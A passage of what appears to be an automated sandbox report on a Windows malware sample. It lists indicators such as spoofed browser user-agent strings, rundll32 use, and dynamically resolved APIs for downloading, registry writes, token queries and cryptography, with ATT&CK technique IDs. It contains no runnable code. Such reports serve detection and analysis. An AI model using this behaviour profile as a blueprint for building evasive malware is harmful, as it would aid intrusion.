\"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\system\\rundll32.exe\" [Source: 00000000-00000892-00000C43-4958536405]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" (Indicator: \"mozilla/4.0 (\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204-00000C96-5866065511\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/7.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/7.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; rv:11.0) like Gecko\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp\")\n Found string \"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"user-agent: \"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found string \"nt: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \": Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00000892)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter URLDownloadToCacheFileA (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter StringFromGUID2 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter IUnknown_QueryService (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSPStartup (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket2 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHJoinLeaf (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHNotify (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetSocketInformation (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHSetSocketInformation (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetSockaddrType (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetWildcardSockaddr (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetBroadcastSockaddr (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHAddressToString (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHStringToAddress (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHIoctl (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NdrClientCall2 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CLSIDFromOle1Class (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject2 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter Dhcpv6QueryLeaseInfo (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceNameToLuidW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter Dhcpv6FreeLeaseInfo (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpIsEnabled (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpQueryLeaseInfo (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NSPStartup (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsQueryConfigAllocEx (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsNameCompare_W (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsApiAlloc (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsQueryExW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadCompartmentId (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAttemptAutodialAddr (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAttemptAutodialName (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSNoteSuccessfulHostentLookup (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsApiFree (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpFreeLeaseInfo (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NdrOleInitializeExtension (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetClassObject (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetMarshalSizeMax (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoMarshalInterface (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoUnmarshalInterface (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetPSClsid (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoReleaseMarshalData (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DcomChannelSetHResult (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPAcquireContext (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPReleaseContext (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGenKey (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDeriveKey (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDestroyKey (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetKeyParam (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetKeyParam (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPExportKey (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPImportKey (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPEncrypt (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDecrypt (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPCreateHash (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPHashData (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPHashSessionKey (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDestroyHash (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSignHash (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPVerifySignature (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGenRandom (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetUserKey (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetProvParam (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetProvParam (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetHashParam (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetHashParam (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDuplicateKey (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDuplicateHash (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcInitFwImports (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcInitImports (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcVerifierCorruptionExpected (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcExtInitializeExtensionPoint (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsFree (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NamespaceCallout (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00005204)\n \"rundll32.exe\" called \"GetProcAddress\" with a 